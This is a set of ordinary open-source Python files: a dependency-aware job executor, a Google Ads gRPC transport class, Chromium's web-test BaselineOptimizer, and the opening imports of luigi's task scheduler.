{key: len(self._jobs[key].dependencies) for key in self._job_keys_as_scheduled},
)
finished_queue = queue.Queue()
heap = []
jobs_in_flight = ThreadSafeCounter()
def put_jobs_into_heap(job_keys):
for job_key in job_keys:
status_table.mark_queued(job_key)
# minus because jobs with larger priority should go first
heappush(heap, (-self._job_priority[job_key], job_key))
def try_to_submit_jobs_from_heap():
def worker(worker_key, work):
status_table.mark_as(RUNNING, worker_key)
try:
with Timer() as timer:
work()
result = (worker_key, SUCCESSFUL, None, timer.elapsed)
except BaseException:
_, exc_value, exc_traceback = sys.exc_info()
result = (
worker_key,
FAILED,
(exc_value, traceback.format_tb(exc_traceback)),
timer.elapsed,
)
finished_queue.put(result)
jobs_in_flight.decrement()
while len(heap) > 0 and jobs_in_flight.get() < pool.num_workers:
priority, job_key = heappop(heap)
jobs_in_flight.increment()
pool.submit_async_work(Work(worker, [(job_key, (self._jobs[job_key]))]))
def submit_jobs(job_keys):
put_jobs_into_heap(job_keys)
try_to_submit_jobs_from_heap()
try:
submit_jobs(self._job_keys_with_no_dependencies)
while not status_table.are_all_done():
try:
(finished_key, result_status, value, duration) = finished_queue.get(timeout=10)
except queue.Empty:
self.log_progress(log, status_table)
try_to_submit_jobs_from_heap()
continue
finished_job = self._jobs[finished_key]
finished_job.duration = duration
direct_dependees = self._dependees[finished_key]
status_table.mark_as(result_status, finished_key)
# Queue downstream tasks.
if result_status is SUCCESSFUL:
try:
finished_job.run_success_callback()
except Exception as e:
log.debug(traceback.format_exc())
raise ExecutionFailure(f"Error in on_success for {finished_key}", e)
ready_dependees = []
for dependee in direct_dependees:
status_table.mark_one_successful_dependency(dependee)
if status_table.is_ready_to_submit(dependee):
ready_dependees.append(dependee)
submit_jobs(ready_dependees)
else: # Failed or canceled.
try:
finished_job.run_failure_callback()
except Exception as e:
log.debug(traceback.format_exc())
raise ExecutionFailure(f"Error in on_failure for {finished_key}", e)
# Propagate failures downstream.
for dependee in direct_dependees:
if status_table.is_unstarted(dependee):
status_table.mark_queued(dependee)
finished_queue.put((dependee, CANCELED, None, 0))
# Log success or failure for this job.
if result_status is FAILED:
exception, tb = value
log.error(f"{finished_key} failed: {exception} in {finished_job.duration}")
if self._print_stack_trace:
log.error("Traceback:\n{}".format("\n".join(tb)))
else:
log.debug(
"{} finished with status {} and in {}".format(
finished_key, result_status, finished_job.duration
)
)
except ExecutionFailure:
raise
except Exception as e:
# Call failure callbacks for jobs that are unfinished.
for key, state in status_table.unfinished_items():
self._jobs[key].run_failure_callback()
log.debug(traceback.format_exc())
raise ExecutionFailure("Error running job", e)
if status_table.has_failures():
raise ExecutionFailure(f"Failed jobs: {', '.join(status_table.failed_keys())}")
def log_progress(self, log, status_table):
running_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is RUNNING)
queued_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is QUEUED)
unstarted_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is UNSTARTED)
log.debug(
"Running ({}):\n {}\n"
"Queued ({}):\n {}\n"
"Unstarted ({}):\n {}\n".format(
len(running_jobs),
"\n ".join(running_jobs),
len(queued_jobs),
"\n ".join(queued_jobs),
len(unstarted_jobs),
"\n ".join(unstarted_jobs),
)
)
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v8.resources.types import conversion_custom_variable
from google.ads.googleads.v8.services.types import (
conversion_custom_variable_service,
)
from .base import ConversionCustomVariableServiceTransport, DEFAULT_CLIENT_INFO
class ConversionCustomVariableServiceGrpcTransport(
ConversionCustomVariableServiceTransport
):
"""gRPC backend transport for ConversionCustomVariableService.
Service to manage conversion custom variables.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = google.auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_conversion_custom_variable(
self,
) -> Callable[
[conversion_custom_variable_service.GetConversionCustomVariableRequest],
conversion_custom_variable.ConversionCustomVariable,
]:
r"""Return a callable for the get conversion custom variable method over gRPC.
Returns the requested conversion custom variable.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetConversionCustomVariableRequest],
~.ConversionCustomVariable]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_conversion_custom_variable" not in self._stubs:
self._stubs[
"get_conversion_custom_variable"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v8.services.ConversionCustomVariableService/GetConversionCustomVariable",
request_serializer=conversion_custom_variable_service.GetConversionCustomVariableRequest.serialize,
response_deserializer=conversion_custom_variable.ConversionCustomVariable.deserialize,
)
return self._stubs["get_conversion_custom_variable"]
@property
def mutate_conversion_custom_variables(
self,
) -> Callable[
[
conversion_custom_variable_service.MutateConversionCustomVariablesRequest
],
conversion_custom_variable_service.MutateConversionCustomVariablesResponse,
]:
r"""Return a callable for the mutate conversion custom
variables method over gRPC.
Creates or updates conversion custom variables. Operation
statuses are returned.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `ConversionCustomVariableError <>`__
`DatabaseError <>`__ `HeaderError <>`__ `InternalError <>`__
`QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.MutateConversionCustomVariablesRequest],
~.MutateConversionCustomVariablesResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "mutate_conversion_custom_variables" not in self._stubs:
self._stubs[
"mutate_conversion_custom_variables"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v8.services.ConversionCustomVariableService/MutateConversionCustomVariables",
request_serializer=conversion_custom_variable_service.MutateConversionCustomVariablesRequest.serialize,
response_deserializer=conversion_custom_variable_service.MutateConversionCustomVariablesResponse.deserialize,
)
return self._stubs["mutate_conversion_custom_variables"]
__all__ = ("ConversionCustomVariableServiceGrpcTransport",)
| |
# Copyright (C) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import logging
from blinkpy.common.memoized import memoized
from blinkpy.web_tests.models.testharness_results import is_all_pass_testharness_result
_log = logging.getLogger(__name__)
class BaselineOptimizer(object):
def __init__(self, host, default_port, port_names):
self._filesystem = host.filesystem
self._default_port = default_port
self._ports = {}
for port_name in port_names:
self._ports[port_name] = host.port_factory.get(port_name)
self._web_tests_dir = default_port.web_tests_dir()
self._parent_of_tests = self._filesystem.dirname(self._web_tests_dir)
self._web_tests_dir_name = self._filesystem.relpath(
self._web_tests_dir, self._parent_of_tests)
# Only used by unit tests.
self.new_results_by_directory = []
def optimize(self, test_name, suffix):
# A visualization of baseline fallback:
# https://docs.google.com/drawings/d/13l3IUlSE99RoKjDwEWuY1O77simAhhF6Wi0fZdkSaMA/
# The full document with more details:
# https://chromium.googlesource.com/chromium/src/+/main/docs/testing/web_test_baseline_fallback.md
# The virtual and non-virtual subtrees are identical, with the virtual
# root being the special node having multiple parents and connecting the
# two trees. We patch the virtual subtree to cut its dependencies on the
# non-virtual one and optimze the two independently. Finally, we treat
# the virtual subtree specially to remove any duplication between the
# two subtrees.
# For CLI compatibility, "suffix" is an extension without the leading
# dot. Yet we use dotted extension everywhere else in the codebase.
# TODO(robertma): Investigate changing the CLI.
assert not suffix.startswith('.')
extension = '.' + suffix
baseline_name = self._default_port.output_filename(
test_name, self._default_port.BASELINE_SUFFIX, extension)
non_virtual_baseline_name = self._virtual_base(baseline_name)
succeeded = True
if non_virtual_baseline_name:
# The baseline belongs to a virtual suite.
_log.debug('Optimizing virtual fallback path.')
self._patch_virtual_subtree(test_name, extension, baseline_name)
succeeded &= self._optimize_subtree(test_name, baseline_name)
self._optimize_virtual_root(test_name, extension, baseline_name)
else:
# The given baseline is already non-virtual.
non_virtual_baseline_name = baseline_name
_log.debug('Optimizing non-virtual fallback path.')
succeeded &= self._optimize_subtree(test_name,
non_virtual_baseline_name)
self._remove_extra_result_at_root(test_name, non_virtual_baseline_name)
if not succeeded:
_log.error('Heuristics failed to optimize %s', baseline_name)
return succeeded
def write_by_directory(self, results_by_directory, writer, indent):
"""Logs results_by_directory in a pretty format."""
for path in sorted(results_by_directory):
writer('%s%s: %s' % (indent, self._platform(path),
results_by_directory[path]))
def read_results_by_directory(self, test_name, baseline_name):
"""Reads the baselines with the given file name in all directories.
Returns:
A dict from directory names to the digest of file content.
"""
results_by_directory = {}
directories = set()
for port in self._ports.values():
directories.update(set(self._relative_baseline_search_path(port)))
for directory in directories:
path = self._join_directory(directory, baseline_name)
if self._filesystem.exists(path):
results_by_directory[directory] = ResultDigest(
self._filesystem, path, self._is_reftest(test_name))
return results_by_directory
def _is_reftest(self, test_name):
return bool(self._default_port.reference_files(test_name))
def _optimize_subtree(self, test_name, baseline_name):
basename = self._filesystem.basename(baseline_name)
results_by_directory, new_results_by_directory = self._find_optimal_result_placement(
test_name, baseline_name)
if new_results_by_directory == results_by_directory:
if new_results_by_directory:
_log.debug(' %s: (already optimal)', basename)
self.write_by_directory(results_by_directory, _log.debug,
' ')
else:
_log.debug(' %s: (no baselines found)', basename)
# This is just used for unit tests.
# Intentionally set it to the old data if we don't modify anything.
self.new_results_by_directory.append(results_by_directory)
return True
# Check if the results before and after optimization are equivalent.
if (self._results_by_port_name(results_by_directory) !=
self._results_by_port_name(new_results_by_directory)):
# This really should never happen. Just a sanity check to make
# sure the script fails in the case of bugs instead of committing
# incorrect baselines.
_log.error(' %s: optimization failed', basename)
self.write_by_directory(results_by_directory, _log.warning,
' ')
return False
_log.debug(' %s:', basename)
_log.debug(' Before: ')
self.write_by_directory(results_by_directory, _log.debug, ' ')
_log.debug(' After: ')
self.write_by_directory(new_results_by_directory, _log.debug, ' ')
self._move_baselines(baseline_name, results_by_directory,
new_results_by_directory)
return True
def _move_baselines(self, baseline_name, results_by_directory,
new_results_by_directory):
data_for_result = {}
for directory, result in results_by_directory.items():
if str(result) not in data_for_result:
source = self._join_directory(directory, baseline_name)
data_for_result[str(
result)] = self._filesystem.read_binary_file(source)
fs_files = []
for directory, result in results_by_directory.items():
if new_results_by_directory.get(directory) != result:
file_name = self._join_directory(directory, baseline_name)
if self._filesystem.exists(file_name):
fs_files.append(file_name)
if fs_files:
_log.debug(' Deleting (file system):')
for platform_dir in sorted(
self._platform(filename) for filename in fs_files):
_log.debug(' ' + platform_dir)
for filename in fs_files:
self._filesystem.remove(filename)
else:
_log.debug(' (Nothing to delete)')
file_names = []
for directory, result in new_results_by_directory.items():
if results_by_directory.get(directory) != result:
destination = self._join_directory(directory, baseline_name)
self._filesystem.maybe_make_directory(
self._filesystem.split(destination)[0])
self._filesystem.write_binary_file(
destination, data_for_result[result.__str__()])
file_names.append(destination)
if file_names:
_log.debug(' Adding:')
for platform_dir in sorted(
self._platform(filename) for filename in file_names):
_log.debug(' ' + platform_dir)
else:
_log.debug(' (Nothing to add)')
def _platform(self, filename):
"""Guesses the platform from a path (absolute or relative).
Returns:
The platform name, or '(generic)' if unable to make a guess.
"""
platform_dir = self._web_tests_dir_name + self._filesystem.sep + 'platform' + self._filesystem.sep
if filename.startswith(platform_dir):
return filename.replace(platform_dir,
'').split(self._filesystem.sep)[0]
platform_dir = self._filesystem.join(self._parent_of_tests,
platform_dir)
if filename.startswith(platform_dir):
return filename.replace(platform_dir,
'').split(self._filesystem.sep)[0]
return '(generic)'
def _port_from_baseline_dir(self, baseline_dir):
"""Returns a Port object from the given baseline directory."""
baseline_dir = self._filesystem.basename(baseline_dir)
for port in self._ports.values():
if self._filesystem.basename(
port.baseline_version_dir()) == baseline_dir:
return port
raise Exception(
'Failed to find port for primary baseline %s.' % baseline_dir)
def _walk_immediate_predecessors_of_virtual_root(
self, test_name, extension, baseline_name, worker_func):
"""Maps a function onto each immediate predecessor of the virtual root.
For each immediate predecessor, we call
worker_func(virtual_baseline, non_virtual_fallback)
where the two arguments are the absolute paths to the virtual platform
baseline and the non-virtual fallback respectively.
"""
actual_test_name = self._virtual_base(test_name)
assert actual_test_name, '%s is not a virtual test.' % test_name
for directory in self._directories_immediately_preceding_root():
port = self._port_from_baseline_dir(directory)
virtual_baseline = self._join_directory(directory, baseline_name)
# return_default=False mandates expected_filename() to return None
# instead of a non-existing generic path when nothing is found.
non_virtual_fallback = port.expected_filename(
actual_test_name, extension, return_default=False)
if not non_virtual_fallback:
# Unable to find a non-virtual fallback baseline, skipping.
continue
worker_func(virtual_baseline, non_virtual_fallback)
def _patch_virtual_subtree(self, test_name, extension, baseline_name):
# Ensure all immediate predecessors of the root have a baseline for this
# virtual suite so that the virtual subtree can be treated completely
# independently. If an immediate predecessor is missing a baseline, find
# its non-virtual fallback and copy over.
_log.debug(
'Copying non-virtual baselines to the virtual subtree to make it independent.'
)
virtual_root_baseline_path = self._filesystem.join(
self._web_tests_dir, baseline_name)
if self._filesystem.exists(virtual_root_baseline_path):
return
def patcher(virtual_baseline, non_virtual_fallback):
if not self._filesystem.exists(virtual_baseline):
_log.debug(' Copying (file system): %s -> %s.',
non_virtual_fallback, virtual_baseline)
self._filesystem.maybe_make_directory(
self._filesystem.split(virtual_baseline)[0])
self._filesystem.copyfile(non_virtual_fallback,
virtual_baseline)
self._walk_immediate_predecessors_of_virtual_root(
test_name, extension, baseline_name, patcher)
def _optimize_virtual_root(self, test_name, extension, baseline_name):
virtual_root_baseline_path = self._filesystem.join(
self._web_tests_dir, baseline_name)
if self._filesystem.exists(virtual_root_baseline_path):
_log.debug(
'Virtual root baseline found. Checking if we can remove it.')
self._try_to_remove_virtual_root(test_name, baseline_name,
virtual_root_baseline_path)
else:
_log.debug(
'Virtual root baseline not found. Searching for virtual baselines redundant with non-virtual ones.'
)
self._unpatch_virtual_subtree(test_name, extension, baseline_name)
def _try_to_remove_virtual_root(self, test_name, baseline_name,
virtual_root_baseline_path):
# See if all the successors of the virtual root (i.e. all non-virtual
# platforms) have the same baseline as the virtual root. If so, the
# virtual root is redundant and can be safely removed.
virtual_root_digest = ResultDigest(self._filesystem,
virtual_root_baseline_path,
self._is_reftest(test_name))
# Read the base (non-virtual) results.
results_by_directory = self.read_results_by_directory(
test_name, self._virtual_base(baseline_name))
results_by_port_name = self._results_by_port_name(results_by_directory)
for port_name in self._ports.keys():
assert port_name in results_by_port_name
if results_by_port_name[port_name] != virtual_root_digest:
return
_log.debug('Deleting redundant virtual root baseline.')
_log.debug(' Deleting (file system): ' + virtual_root_baseline_path)
self._filesystem.remove(virtual_root_baseline_path)
def _unpatch_virtual_subtree(self, test_name, extension, baseline_name):
# Check all immediate predecessors of the virtual root and delete those
# duplicate with their non-virtual fallback, essentially undoing some
# of the work done in _patch_virtual_subtree.
is_reftest = self._is_reftest(test_name)
def unpatcher(virtual_baseline, non_virtual_fallback):
if self._filesystem.exists(virtual_baseline) and \
(ResultDigest(self._filesystem, virtual_baseline, is_reftest) ==
ResultDigest(self._filesystem, non_virtual_fallback, is_reftest)):
_log.debug(
' Deleting (file system): %s (redundant with %s).',
virtual_baseline, non_virtual_fallback)
self._filesystem.remove(virtual_baseline)
self._walk_immediate_predecessors_of_virtual_root(
test_name, extension, baseline_name, unpatcher)
def _baseline_root(self):
"""Returns the name of the root (generic) baseline directory."""
return self._web_tests_dir_name
def _baseline_search_path(self, port):
"""Returns the baseline search path (a list of absolute paths) of the
given port."""
return port.baseline_search_path()
@memoized
def _relative_baseline_search_path(self, port):
"""Returns a list of paths to check for baselines in order.
The generic baseline path is appended to the list. All paths are
relative to the parent of the test directory.
"""
baseline_search_path = self._baseline_search_path(port)
relative_paths = [
self._filesystem.relpath(path, self._parent_of_tests)
for path in baseline_search_path
]
relative_baseline_root = self._baseline_root()
return relative_paths + [relative_baseline_root]
def _virtual_base(self, baseline_name):
"""Returns the base (non-virtual) version of baseline_name, or None if
baseline_name is not virtual."""
# Note: port.lookup_virtual_test_base in fact expects a test_name,
# but baseline_name also works here.
return self._default_port.lookup_virtual_test_base(baseline_name)
def _join_directory(self, directory, baseline_name):
"""Returns the absolute path to the baseline in the given directory."""
return self._filesystem.join(self._parent_of_tests, directory,
baseline_name)
def _results_by_port_name(self, results_by_directory):
"""Transforms a by-directory result dict to by-port-name.
The method mimicks the baseline search behaviour, i.e. results[port] is
the first baseline found on the baseline search path of the port. If no
baseline is found on the search path, the test is assumed to be an all-
PASS testharness.js test.
Args:
results_by_directory: A dictionary returned by read_results_by_directory().
Returns:
A dictionary mapping port names to their baselines.
"""
results_by_port_name = {}
for port_name, port in self._ports.items():
for directory in self._relative_baseline_search_path(port):
if directory in results_by_directory:
results_by_port_name[port_name] = results_by_directory[
directory]
break
if port_name not in results_by_port_name:
# Implicit extra result.
results_by_port_name[port_name] = ResultDigest(None, None)
return results_by_port_name
@memoized
def _directories_immediately_preceding_root(self):
"""Returns a list of directories immediately preceding the root on
search paths."""
directories = set()
for port in self._ports.values():
directory = self._filesystem.relpath(
self._baseline_search_path(port)[-1], self._parent_of_tests)
directories.add(directory)
return frozenset(directories)
def _optimize_result_for_root(self, new_results_by_directory):
# The root directory (i.e. web_tests) is the only one not
# corresponding to a specific platform. As such, baselines in
# directories that immediately precede the root on search paths may
# be promoted up if they are all the same.
# Example: if win and mac have the same baselines, then they can be
# promoted up to be the root baseline.
# All other baselines can only be removed if they're redundant with a
# baseline later on the search path. They can never be promoted up.
immediately_preceding_root = self._directories_immediately_preceding_root(
)
shared_result = None
root_baseline_unused = False
for directory in immediately_preceding_root:
this_result = new_results_by_directory.get(directory)
# If any of these directories don't have a baseline, there's no optimization we can do.
if not this_result:
return
if not shared_result:
shared_result = this_result
elif shared_result != this_result:
root_baseline_unused = True
baseline_root = self._baseline_root()
# The root baseline is unused if all the directories immediately preceding the root
# have a baseline, but have different baselines, so the baselines can't be promoted up.
if root_baseline_unused:
if baseline_root in new_results_by_directory:
del new_results_by_directory[baseline_root]
return
new_results_by_directory[baseline_root] = shared_result
for directory in immediately_preceding_root:
del new_results_by_directory[directory]
def _find_optimal_result_placement(self, test_name, baseline_name):
results_by_directory = self.read_results_by_directory(
test_name, baseline_name)
results_by_port_name = self._results_by_port_name(results_by_directory)
new_results_by_directory = self._remove_redundant_results(
results_by_directory, results_by_port_name)
self._optimize_result_for_root(new_results_by_directory)
return results_by_directory, new_results_by_directory
def _remove_redundant_results(self, results_by_directory,
results_by_port_name):
# For every port, traverse its search path in the fallback order (from
# specific to generic). Remove duplicate baselines until a different
# baseline is found (or the root is reached), i.e., keep the most
# generic one among duplicate baselines.
new_results_by_directory = copy.copy(results_by_directory)
for port_name, port in self._ports.items():
current_result = results_by_port_name.get(port_name)
# This happens if we're missing baselines for a port.
if not current_result:
continue
search_path = self._relative_baseline_search_path(port)
current_index, current_directory = self._find_in_search_path(
search_path, current_result, new_results_by_directory)
found_different_result = False
for index in range(current_index + 1, len(search_path)):
new_directory = search_path[index]
if new_directory not in new_results_by_directory:
# No baseline in this directory.
continue
elif new_results_by_directory[new_directory] == current_result:
# The baseline in current_directory is redundant with the
# baseline in new_directory which is later in the search
# path. Remove the earlier one and point current to new.
if current_directory in new_results_by_directory:
del new_results_by_directory[current_directory]
current_directory = new_directory
else:
# A different result is found, so stop.
found_different_result = True
break
# If we did not find a different fallback and current_result is
# an extra result, we can safely remove it.
# Note that we do not remove the generic extra result here.
# Roots (virtual and non-virtual) are treated specially later.
if (not found_different_result and current_result.is_extra_result
and current_directory != self._baseline_root()
and current_directory in new_results_by_directory):
del new_results_by_directory[current_directory]
return new_results_by_directory
def _find_in_search_path(self, search_path, current_result,
results_by_directory):
"""Finds the index and the directory of a result on a search path."""
for index, directory in enumerate(search_path):
if (directory in results_by_directory
and (results_by_directory[directory] == current_result)):
return index, directory
assert current_result.is_extra_result, (
'result %s not found in search path %s, %s' %
(current_result, search_path, results_by_directory))
# Implicit extra result at the root.
return len(search_path) - 1, search_path[-1]
def _remove_extra_result_at_root(self, test_name, baseline_name):
"""Removes extra result at the non-virtual root."""
assert not self._virtual_base(baseline_name), \
'A virtual baseline is passed in.'
path = self._join_directory(self._baseline_root(), baseline_name)
if (self._filesystem.exists(path)
and ResultDigest(self._filesystem, path,
self._is_reftest(test_name)).is_extra_result):
_log.debug(
'Deleting extra baseline (empty, -expected.png for reftest, or all-PASS testharness JS result)'
)
_log.debug(' Deleting (file system): ' + path)
self._filesystem.remove(path)
class ResultDigest(object):
"""Digest of a result file for fast comparison.
A result file can be any actual or expected output from a web test,
including text and image. SHA1 is used internally to digest the file.
"""
# A baseline is extra in the following cases:
# 1. if the result is an all-PASS testharness result,
# 2. if the result is empty,
# 3. if the test is a reftest and the baseline is an -expected-png file.
#
# An extra baseline should be deleted if doesn't override the fallback
# baseline. To check that, we compare the ResultDigests of the baseline and
# the fallback baseline. If the baseline is not the root baseline and the
# fallback baseline doesn't exist, we assume that the fallback baseline is
# an *implicit extra result* which equals to any extra baselines, so that
# the extra baseline will be treated as not overriding the fallback baseline
# thus will be removed.
_IMPLICIT_EXTRA_RESULT = '<EXTRA>'
def __init__(self, fs, path, is_reftest=False):
"""Constructs the digest for a result.
Args:
fs: An instance of common.system.FileSystem.
path: The path to a result file. If None is provided, the result is
an *implicit* extra result.
is_reftest: Whether the test is a reftest.
"""
self.path = path
if path is None:
self.sha = self._IMPLICIT_EXTRA_RESULT
self.is_extra_result = True
return
assert fs.exists(path)
if path.endswith('.txt'):
content = fs.read_text_file(path)
self.is_extra_result = not content or is_all_pass_testharness_result(
content)
# Unfortunately, we may read the file twice, once in text mode
# and once in binary mode.
self.sha = fs.sha1(path)
return
if path.endswith('.png') and is_reftest:
self.is_extra_result = True
self.sha = ''
return
self.is_extra_result = not fs.read_binary_file(path)
self.sha = fs.sha1(path)
def __eq__(self, other):
if other is None:
return False
# Implicit extra result is equal to any extra results.
if self.sha == self._IMPLICIT_EXTRA_RESULT or other.sha == self._IMPLICIT_EXTRA_RESULT:
return self.is_extra_result and other.is_extra_result
return self.sha == other.sha
# Python 2 does not automatically delegate __ne__ to not __eq__.
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return self.sha[0:7]
def __repr__(self):
is_extra_result = ' EXTRA' if self.is_extra_result else ''
return '<ResultDigest %s%s %s>' % (self.sha, is_extra_result,
self.path)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The system for scheduling tasks and executing them in order.
Deals with dependencies, priorities, resources, etc.
The :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.
See :doc:`/central_scheduler` for more info.
"""
import collections
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import functools
import itertools
import logging
import os
import time
from luigi import six
from luigi import configuration
from luigi import notifications
from luigi import parameter
from luigi import task_history as history
